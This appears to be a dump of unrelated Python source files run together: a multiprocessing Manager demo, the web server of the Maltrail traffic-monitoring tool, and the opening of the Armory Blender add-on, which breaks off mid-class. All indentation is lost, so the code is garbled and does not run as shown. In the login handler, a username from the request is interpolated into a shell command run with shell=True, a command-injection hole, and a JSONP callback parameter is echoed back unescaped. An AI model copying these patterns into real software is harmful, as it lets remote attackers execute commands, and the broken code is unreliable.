pm.startEvaluation("print('hello world')\n{'answer': 1 + 1}")
sys.exit(app.exec_())
|
manager.py
|
from multiprocessing import Process, Manager, current_process
import os, time, signal, sys
def f(d, l):
def _sh(sig, _):
if sig == signal.SIGTERM:
print "_sh -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
sys.exit(0)
signal.signal(signal.SIGTERM, _sh)
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
print "f -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
try:
while True:
time.sleep(1000)
finally:
print "exiting..."
def main(d, l):
print "main -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
p = Process(target=f, args=(d, l))
p.start()
p.join(2)
p.terminate()
print(d)
print(l)
if __name__ == '__main__':
manager = Manager()
d = manager.dict()
l = manager.list(range(10))
main(d, l)
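# Illustrative expected output (PIDs, ordering and dict ordering will differ):
# the child prints "f -> c: <pid>, p: <ppid>", the SIGTERM handler triggered by
# p.terminate() prints "_sh -> ..." and then "exiting...", and the parent prints
# the shared proxies, e.g. {1: '1', '2': 2, 0.25: None} and
# [9, 8, 7, 6, 5, 4, 3, 2, 1, 0].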
|
httpd.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2021 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import subprocess
import threading
import time
import traceback
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.compat import xrange
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import IS_WIN
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from thirdparty import six
from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer
from thirdparty.six.moves import http_client as _http_client
from thirdparty.six.moves import socketserver as _socketserver
from thirdparty.six.moves import urllib as _urllib
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
_fail2ban_cache = None
_fail2ban_key = None
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
_BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
if six.PY2:
import OpenSSL # pyopenssl
ThreadingServer.__init__(self, server_address, HandlerClass)
for method in ("TLSv1_2_METHOD", "TLSv1_1_METHOD", "TLSv1_METHOD", "TLS_METHOD", "SSLv23_METHOD", "SSLv2_METHOD"):
if hasattr(OpenSSL.SSL, method):
ctx = OpenSSL.SSL.Context(getattr(OpenSSL.SSL, method))
break
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
else:
import ssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(pem, pem)
self.socket = ctx.wrap_socket(socket.socket(self.address_family, self.socket_type), server_side=True)
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
pass
class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(_urllib.parse.parse_qs(self.data))
if query:
params.update(_urllib.parse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, 'r').read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
if ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(_http_client.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = content or open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
# For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src * blob:; script-src 'self' 'unsafe-eval' https://stat.ripe.net; frame-src *; object-src 'none'; block-all-mixed-content;")
if os.path.basename(path) == "index.html":
content = re.sub(br'\s*<script[^>]+src="js/demo.js"></script>', b'', content)
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(_http_client.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
if isinstance(content, six.text_type):
content = content.encode(UNICODE_ENCODING)
for match in re.finditer(b"<\\!(\\w+)\\!>", content):
name = match.group(1).decode(UNICODE_ENCODING)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{name: _()})
if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = six.BytesIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
try:
if content:
self.wfile.write(content)
self.wfile.flush()
except:
pass
def do_POST(self):
length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length)).decode(UNICODE_ENCODING)
data = _urllib.parse.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
if retval is None and not config.USERS:
retval = AttribDict({"username": "?"})
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return "%s/%s" % (NAME, self._version())
def end_headers(self):
if not hasattr(self, "_headers_ended"):
_BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
_BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
version = VERSION
try:
for line in open(os.path.join(os.path.dirname(__file__), "settings.py"), 'r'):
match = re.search(r'VERSION = "([^"]*)', line)
if match:
version = match.group(1)
break
except:
pass
return version
def _statics(self):
latest = max(glob.glob(os.path.join(os.path.dirname(__file__), "..", "trails", "static", "malware", "*.txt")), key=os.path.getmtime)
return "/%s" % datetime.datetime.fromtimestamp(os.path.getmtime(latest)).strftime(DATE_FORMAT)
def _logo(self):
if config.HEADER_LOGO:
retval = config.HEADER_LOGO
else:
retval = '<img src="images/mlogo.png" style="width: 25px">altrail'
return retval
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING))
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
try:
uid = int(uid)
except ValueError:
uid = None
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
_ = os.urandom(SESSION_ID_LENGTH)
session_id = _.hex() if hasattr(_, "hex") else _.encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", '*', "::", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
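# e.g. (illustrative): a netfilter of "10.0.0.0/24, 192.168.1.5" expands the
# /24 (mask >= 16) into individual addresses, adds the single address, and
# stores them as one regex, so only matching event log lines are shown to that user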
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not IS_WIN:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(_http_client.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(config.TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _fail2ban(self, params):
global _fail2ban_cache
global _fail2ban_key
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = ""
key = int(time.time()) >> 3
if config.FAIL2BAN_REGEX:
try:
re.compile(config.FAIL2BAN_REGEX)
except re.error:
content = "invalid regular expression used in option FAIL2BAN_REGEX"
else:
if key == _fail2ban_key:
content = _fail2ban_cache
else:
result = set()
_ = os.path.join(config.LOG_DIR, "%s.log" % datetime.datetime.now().strftime("%Y-%m-%d"))
if os.path.isfile(_):
for line in open(_, "r"):
if re.search(config.FAIL2BAN_REGEX, line, re.I):
result.add(line.split()[3])
content = "\n".join(result)
_fail2ban_cache = content
_fail2ban_key = key
else:
content = "configuration option FAIL2BAN_REGEX not set"
return content
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print("[!] invalid date format in request")
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print("[!] invalid date format in request")
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None and not session.mask_custom:
session.range_handle.seek(start)
self.send_response(_http_client.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = io.StringIO(), set(), [], ""
for netfilter in session.netfilters or []:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif "\\." in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print("[!] invalid network filter '%s'" % netfilter)
return
for line in session.range_handle:
display = session.netfilters is None
ip = None
line = line.decode(UNICODE_ENCODING, "ignore")
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if session.mask_custom and "(custom)" in line:
line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line)
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(_http_client.OK) # instead of _http_client.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * (1 + content.count(b'\n')) * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100.0) * 100)
else:
counts[timestamp] = content.count(b'\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
_BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
try:
if pem:
server = SSLThreadingServer(_address, pem, SSLReqHandler)
else:
server = ThreadingServer(_address, ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print("[i] starting HTTP%s server at http%s://%s:%d/" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1]))
print("[^] running...")
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
bl_info = {
"name": "Armory",
"category": "Render",
"location": "Properties -> Render -> Armory Player",
"description": "3D Game Engine for Blender",
"author": "Armory3D.org",
"version": (0, 6, 0),
"blender": (2, 80, 0),
"wiki_url": "http://armory3d.org/manual",
"tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
bl_idname = __name__
def sdk_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
def ffmpeg_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
def renderdoc_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
sdk_bundled: BoolProperty(name="Bundled SDK", default=True)
sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
show_advanced: BoolProperty(name="Show Advanced", default=False)
player_gapi_win: EnumProperty(
items = [('direct3d11', 'Auto', 'direct3d11'),
('opengl', 'OpenGL', 'opengl'),
('direct3d11', 'Direct3D11', 'direct3d11')],
name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_linux: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_mac: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
code_editor: EnumProperty(
items = [('kodestudio', 'Kode Studio', 'kodestudio'),
('default', 'System Default', 'default')],
name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False)
legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
viewport_controls: EnumProperty(
items=[('qwerty', 'qwerty', 'qwerty'),
('azerty', 'azerty', 'azerty')],
name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
skip_update: BoolProperty(name="", default=False)
def draw(self, context):
self.skip_update = False
layout = self.layout
layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.")
p = bundled_sdk_path()
if os.path.exists(p):
layout.prop(self, "sdk_bundled")
if not self.sdk_bundled:
layout.prop(self, "sdk_path")
else:
layout.prop(self, "sdk_path")
box = layout.box().column()
box.label(text="Armory Updater")
box.label(text="Note: Development version may run unstable!")
row = box.row(align=True)
row.alignment = 'EXPAND'
row.operator("arm_addon.help", icon="URL")
row.operator("arm_addon.update", icon="FILE_REFRESH")
row.operator("arm_addon.restore")
box.label(text="Check console for download progress. Please restart Blender after successful SDK update.")
layout.prop(self, "show_advanced")
if self.show_advanced:
box = layout.box().column()
box.prop(self, "player_gapi_" + get_os())
box.prop(self, "code_editor")
box.prop(self, "renderdoc_path")
box.prop(self, "ffmpeg_path")
box.prop(self, "viewport_controls")
box.prop(self, "ui_scale")
box.prop(self, "khamake_threads")
box.prop(self, "save_on_build")
box.prop(self, "legacy_shaders")
box.prop(self, "relative_paths")
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
if bpy.data.filepath == '':
return ''
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_sdk_path(context):
preferences = context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if os.path.exists(get_fp() + '/armsdk'):
return get_fp() + '/armsdk'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
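# Illustrative usage (hypothetical command and callback): run a command without
# blocking Blender's UI thread and get notified when it finishes, e.g.
#   run_proc(['git', '--version'], lambda: print('git check finished'))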
def git_clone(done, p, gitn, n, recursive=False):
if not os.path.exists(p + '/' + n + '_backup'):
os.rename(p + '/' + n, p + '/' + n + '_backup')
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
if recursive:
run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done)
else:
run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done)
def restore_repo(p, n):
if os.path.exists(p + '/' + n + '_backup'):
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
os.rename(p + '/' + n + '_backup', p + '/' + n)
class ArmAddonStartButton(bpy.types.Operator):
'''Start Armory integration'''
bl_idname = "arm_addon.start"
bl_label = "Start"
running = False
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
print("Configure Armory SDK path first")
return {"CANCELLED"}
scripts_path = sdk_path + "/armory/blender/"
sys.path.append(scripts_path)
local_sdk = os.path.exists(get_fp() + '/armsdk')
import start
start.register(local_sdk=local_sdk)
ArmAddonStartButton.running = True
return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
'''Stop Armory integration'''
bl_idname = "arm_addon.stop"
bl_label = "Stop"
def execute(self, context):
import start
start.unregister()
ArmAddonStartButton.running = False
return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.update"
